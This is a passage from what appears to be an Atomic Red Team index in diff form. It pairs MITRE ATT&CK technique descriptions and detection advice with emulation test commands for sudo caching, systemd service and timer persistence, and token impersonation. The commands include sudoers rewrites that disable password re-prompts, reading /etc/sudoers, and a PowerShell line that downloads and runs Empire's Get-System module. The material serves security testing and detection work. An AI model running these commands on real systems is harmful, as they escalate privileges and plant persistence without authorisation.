/Library/StartupItems + + [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware) + supported_platforms: + - macos + executor: + command: 'sudo touch /Library/StartupItems/EvilStartup.plist + +' + cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist + +' + name: sh + elevation_required: true + T1548.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1548.003 + url: https://attack.mitre.org/techniques/T1548/003 + - url: https://www.sudo.ws/ + description: Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018. + source_name: sudo man page 2018 + - url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ + description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web + traffic. Retrieved July 10, 2017. + source_name: OSX.Dok Malware + - url: https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does + description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually + Does. Retrieved March 19, 2018. + source_name: cybereason osx proton + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Sudo and Sudo Caching + description: |- + Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges. + + Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again). + + The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though. + + Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user. + + In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default. + id: attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-03-27T01:03:26.306Z' + created: '2020-01-30T14:34:44.992Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - root + x_mitre_permissions_required: + - User + x_mitre_detection: On Linux, auditd can alert every time a user's actual ID + and effective ID are different (this is what happens when you sudo). This + technique is abusing normal functionality in macOS and Linux systems, but + sudo has the ability to log all input and output based on the LOG_INPUT + and LOG_OUTPUT directives in the /etc/sudoers file. + x_mitre_data_sources: + - 'Process: Process Metadata' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + x_mitre_platforms: + - Linux + - macOS + identifier: T1548.003 + atomic_tests: + - name: Sudo usage + auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e + description: 'Common Sudo enumeration methods. + +' + supported_platforms: + - macos + - linux + executor: + name: sh + elevation_required: true + command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n" + - name: Unlimited sudo cache timeout + auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc + description: 'Sets sudo caching timestamp_timeout to a value for unlimited. + This is dangerous to modify without using ''visudo'', do not do this on a + production system. + +' + supported_platforms: + - macos + - linux + executor: + name: sh + elevation_required: true + command: | + sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers + sudo visudo -c -f /etc/sudoers + - name: Disable tty_tickets for sudo caching + auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1 + description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous + to modify without using ''visudo'', do not do this on a production system. + +' + supported_platforms: + - macos + - linux + executor: + name: sh + elevation_required: true + command: |- + sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers" + sudo visudo -c -f /etc/sudoers + T1543.002: + technique: + id: attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b + description: "Adversaries may create or modify systemd services to repeatedly + execute malicious payloads as part of persistence. The systemd service manager + is commonly used for managing background daemon processes (also known as services) + and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: + Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization + (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, + CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit + and Upstart while remaining backwards compatible with the aforementioned init + systems.\n\nSystemd utilizes configuration files known as service units to + control how services boot and under what conditions. By default, these unit + files are stored in the /etc/systemd/system and /usr/lib/systemd/system + directories and have the file extension .service. Each service + unit file may contain numerous directives that can execute system commands:\n\n* + ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands + when a services is started manually by 'systemctl' or on system start if the + service is set to automatically start. \n* ExecReload directive covers when + a service restarts. \n* ExecStop and ExecStopPost directives cover when a + service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd + functionality to establish persistent access to victim systems by creating + and/or modifying service unit files that cause systemd to execute malicious + commands at system boot.(Citation: Anomali Rocke March 2019)\n\nWhile adversaries + typically require root privileges to create/modify service unit files in the + /etc/systemd/system and /usr/lib/systemd/system + directories, low privilege users can create/modify service unit files in directories + such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: + Rapid7 Service Persistence 22JUNE2016)" + name: Systemd Service + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1543.002 + url: https://attack.mitre.org/techniques/T1543/002 + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html + - source_name: 'Linux man-pages: systemd January 2014' + url: http://man7.org/linux/man-pages/man1/systemd.1.html + description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. + Retrieved April 23, 2019. + - source_name: Freedesktop.org Linux systemd 29SEP2018 + url: https://www.freedesktop.org/wiki/Software/systemd/ + description: Freedesktop.org. (2018, September 29). systemd System and Service + Manager. Retrieved April 23, 2019. + - source_name: Anomali Rocke March 2019 + url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang + description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With + a New Malware Family Written in Golang. Retrieved April 24, 2019. + - source_name: Rapid7 Service Persistence 22JUNE2016 + url: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence + description: Rapid7. (2016, June 22). Service Persistence. Retrieved April + 23, 2019. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-09T13:46:29.701Z' + created: '2020-01-17T16:15:19.870Z' + x_mitre_platforms: + - Linux + x_mitre_detection: |- + Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home//.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. + + Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: systemctl list-units -–type=service –all. Analyze the contents of .service files present on the file system and ensure that they refer to legitimate, expected executables. + + Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as /usr/sbin/service may reveal malicious systemd service execution. + x_mitre_permissions_required: + - User + - root + x_mitre_is_subtechnique: true + x_mitre_version: '1.2' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Service: Service Creation' + - 'Service: Service Modification' + x_mitre_contributors: + - Tony Lambert, Red Canary + identifier: T1543.002 + atomic_tests: + - name: Create Systemd Service + auto_generated_guid: d9e4f24f-aa67-4c6e-bcbf-85622b697a7c + description: 'This test creates a Systemd service unit file and enables it as + a service. + +' + supported_platforms: + - linux + input_arguments: + systemd_service_path: + description: Path to systemd service unit file + type: Path + default: "/etc/systemd/system" + systemd_service_file: + description: File name of systemd service unit file + type: String + default: art-systemd-service.service + execstoppost_action: + description: ExecStopPost action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstoppost-marker" + execreload_action: + description: ExecReload action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execreload-marker" + execstart_action: + description: ExecStart action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstart-marker" + execstop_action: + description: ExecStop action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstop-marker" + execstartpre_action: + description: ExecStartPre action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstartpre-marker" + execstartpost_action: + description: ExecStartPost action for Systemd service + type: String + default: "/bin/touch /tmp/art-systemd-execstartpost-marker" + executor: + command: | + echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file} + echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file} + echo "" >> #{systemd_service_path}/#{systemd_service_file} + echo "[Service]" >> #{systemd_service_path}/#{systemd_service_file} + echo "Type=simple" + echo "ExecStart=#{execstart_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStartPre=#{execstartpre_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStartPost=#{execstartpost_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecReload=#{execreload_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStop=#{execstop_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "ExecStopPost=#{execstoppost_action}" >> #{systemd_service_path}/#{systemd_service_file} + echo "" >> #{systemd_service_path}/#{systemd_service_file} + echo "[Install]" >> #{systemd_service_path}/#{systemd_service_file} + echo "WantedBy=default.target" >> #{systemd_service_path}/#{systemd_service_file} + systemctl daemon-reload + systemctl enable #{systemd_service_file} + systemctl start #{systemd_service_file} + cleanup_command: | + systemctl stop #{systemd_service_file} + systemctl disable #{systemd_service_file} + rm -rf #{systemd_service_path}/#{systemd_service_file} + systemctl daemon-reload + name: bash + T1053.006: + technique: + id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21 + description: |- + Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) + + Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/. + + An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence. + name: Systemd Timers + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1053.006 + url: https://attack.mitre.org/techniques/T1053/006 + - source_name: archlinux Systemd Timers Aug 2020 + url: https://wiki.archlinux.org/index.php/Systemd/Timers + description: archlinux. (2020, August 11). systemd/Timers. Retrieved October + 12, 2020. + - source_name: 'Linux man-pages: systemd January 2014' + url: http://man7.org/linux/man-pages/man1/systemd.1.html + description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. + Retrieved April 23, 2019. + - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux + AUR Package Repository. Retrieved April 23, 2019. + url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/ + source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018 + - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public + Arch package compromise. Retrieved April 23, 2019. + url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a + source_name: gist Arch package compromise 10JUL2018 + - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved + April 23, 2019. + url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html + source_name: acroread package compromised Arch Linux Mail 8JUL2018 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-14T15:20:00.754Z' + created: '2020-10-12T17:50:31.584Z' + x_mitre_platforms: + - Linux + x_mitre_contributors: + - SarathKumar Rajendran, Trimble Inc + x_mitre_data_sources: + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_detection: |- + Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. + + Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables. + + Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020) + x_mitre_permissions_required: + - User + - root + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1053.006 + atomic_tests: + - name: Create Systemd Service and Timer + auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b + description: "This test creates Systemd service and timer then starts and enables + the Systemd timer \n" + supported_platforms: + - linux + input_arguments: + path_to_systemd_service: + description: Path to systemd service unit file + type: Path + default: "/etc/systemd/system/art-timer.service" + path_to_systemd_timer: + description: Path to service timer file + type: Path + default: "/etc/systemd/system/art-timer.timer" + systemd_service_name: + description: Name of systemd service + type: String + default: art-timer.service + systemd_timer_name: + description: Name of systemd service timer + type: String + default: art-timer.timer + executor: + command: | + echo "[Unit]" > #{path_to_systemd_service} + echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service} + echo "[Service]" >> #{path_to_systemd_service} + echo "Type=simple" >> #{path_to_systemd_service} + echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service} + echo "[Install]" >> #{path_to_systemd_service} + echo "WantedBy=multi-user.target" >> #{path_to_systemd_service} + echo "[Unit]" > #{path_to_systemd_timer} + echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer} + echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer} + echo "[Timer]" >> #{path_to_systemd_timer} + echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer} + echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer} + echo "[Install]" >> #{path_to_systemd_timer} + echo "WantedBy=timers.target" >> #{path_to_systemd_timer} + systemctl start #{systemd_timer_name} + systemctl enable #{systemd_timer_name} + systemctl daemon-reload + cleanup_command: | + systemctl stop #{systemd_timer_name} + systemctl disable #{systemd_timer_name} + rm #{path_to_systemd_service} + rm #{path_to_systemd_timer} + systemctl daemon-reload + name: bash + T1055.003: + technique: + created: '2020-01-14T01:28:32.166Z' + modified: '2020-11-10T18:29:30.941Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6 + description: "Adversaries may inject malicious code into hijacked processes + in order to evade process-based defenses as well as possibly elevate privileges. + Thread Execution Hijacking is a method of executing arbitrary code in the + address space of a separate live process. \n\nThread Execution Hijacking is + commonly performed by suspending an existing process then unmapping/hollowing + its memory, which can then be replaced with malicious code or the path to + a DLL. A handle to an existing victim process is first created with native + Windows API calls such as OpenThread. At this point the process + can be suspended then written to, realigned to the injected code, and resumed + via SuspendThread , VirtualAllocEx, WriteProcessMemory, + SetThreadContext, then ResumeThread respectively.(Citation: + Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) + but targets an existing process rather than creating a process in a suspended + state. \n\nRunning code in the context of another process may allow access + to the process's memory, system/network resources, and possibly elevated privileges. + Execution via Thread Execution Hijacking may also evade detection from security + products since the execution is masked under a legitimate process. " + name: Thread Execution Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1055.003 + url: https://attack.mitre.org/techniques/T1055/003 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + x_mitre_platforms: + - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_detection: "Monitoring Windows API calls indicative of the various types + of code injection may generate a significant amount of data and may not be + directly useful for defense unless collected under specific circumstances + for known bad sequences of calls, since benign use of API functions may be + common and difficult to distinguish from malicious behavior. Windows API calls + such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, + and those that can be used to modify memory within another process, such as + VirtualAllocEx/WriteProcessMemory, may be used for + this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze + process behavior to determine if a process is performing actions it usually + does not, such as opening network connections, reading files, or other suspicious + actions that could relate to post-compromise behavior. " + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_defense_bypassed: + - Application control + - Anti-virus + atomic_tests: [] + T1055.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1055.005 + url: https://attack.mitre.org/techniques/T1055/005 + - url: https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html + description: Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif + Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. + Retrieved December 18, 2017. + source_name: FireEye TLS Nov 2017 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Thread Local Storage + description: "Adversaries may inject malicious code into processes via thread + local storage (TLS) callbacks in order to evade process-based defenses as + well as possibly elevate privileges. TLS callback injection is a method of + executing arbitrary code in the address space of a separate live process. + \n\nTLS callback injection involves manipulating pointers inside a portable + executable (PE) to redirect a process to malicious code before reaching the + code's legitimate entry point. TLS callbacks are normally used by the OS to + setup and/or cleanup data used by threads. Manipulating TLS callbacks may + be performed by allocating and writing to specific offsets within a process’ + memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) + techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: + FireEye TLS Nov 2017)\n\nRunning code in the context of another process may + allow access to the process's memory, system/network resources, and possibly + elevated privileges. Execution via TLS callback injection may also evade detection + from security products since the execution is masked under a legitimate process. " + id: attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-11-10T18:29:30.984Z' + created: '2020-01-14T01:30:41.092Z' + x_mitre_defense_bypassed: + - Anti-virus + - Application control + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_detection: "Monitoring Windows API calls indicative of the various types + of code injection may generate a significant amount of data and may not be + directly useful for defense unless collected under specific circumstances + for known bad sequences of calls, since benign use of API functions may be + common and difficult to distinguish from malicious behavior. Windows API calls + such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, + and those that can be used to modify memory within another process, such as + VirtualAllocEx/WriteProcessMemory, may be used for + this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze + process behavior to determine if a process is performing actions it usually + does not, such as opening network connections, reading files, or other suspicious + actions that could relate to post-compromise behavior. " + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + atomic_tests: [] + T1547.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.003 + url: https://attack.mitre.org/techniques/T1547/003 + - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top + description: Microsoft. (2018, February 1). Windows Time Service (W32Time). + Retrieved March 26, 2018. + source_name: Microsoft W32Time Feb 2018 + - url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx + description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018. + source_name: Microsoft TimeProvider + - url: https://github.com/scottlundgren/w32time + description: Lundgren, S. (2017, October 28). w32time. Retrieved March 26, + 2018. + source_name: Github W32Time Oct 2017 + - url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings + description: Mathers, B. (2017, May 31). Windows Time Service Tools and Settings. + Retrieved March 26, 2018. + source_name: Microsoft W32Time May 2017 + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Time Providers + description: |- + Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider) + + Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider) + + Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017) + id: attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T15:24:26.476Z' + created: '2020-01-24T15:51:52.317Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - SYSTEM + - Administrator + x_mitre_detection: |- + Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017) + + The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns) + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + - 'Process: Process Creation' + x_mitre_contributors: + - Scott Lundgren, @5twenty9, Carbon Black + x_mitre_platforms: + - Windows + atomic_tests: [] + T1134.001: + technique: + created: '2020-02-18T16:39:06.289Z' + modified: '2020-03-26T21:29:18.608Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d + description: |- + Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread. + + An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system. + name: Token Impersonation/Theft + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1134.001 + url: https://attack.mitre.org/techniques/T1134/001 + - url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing + description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved + April 21, 2017. + source_name: Microsoft Command-line Logging + x_mitre_platforms: + - Windows + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Command: Command Execution' + x_mitre_detection: |- + If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) + + Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex), ImpersonateLoggedOnUser , and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. + x_mitre_defense_bypassed: + - Windows User Account Control + - System access controls + - File system access controls + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1134.001 + atomic_tests: + - name: Named pipe client impersonation + auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966 + description: |- + Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. + When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). + + Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ + supported_platforms: + - windows + executor: + command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' + -UseBasicParsing); Get-System -Technique NamedPipe -Verbose + name: powershell + elevation_required: true + - name: "`SeDebugPrivilege` token duplication" + auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0 + description: |- + Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process. + When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). + supported_platforms: + - windows + executor: + command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' + -UseBasicParsing); Get-System -Technique Token -Verbose + name: powershell + elevation_required: true + T1546.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.005 + url: https://attack.mitre.org/techniques/T1546/005 + - source_name: Trap Manual + url: https://ss64.com/bash/trap.html + description: ss64. (n.d.). trap. Retrieved May 21, 2019. + - source_name: Cyberciti Trap Statements + url: https://bash.cyberciti.biz/guide/Trap_statement + description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, + 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Trap + description: |- + Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. + + Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements) + id: attack-pattern--63220765-d418-44de-8fae-694b3912317d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - 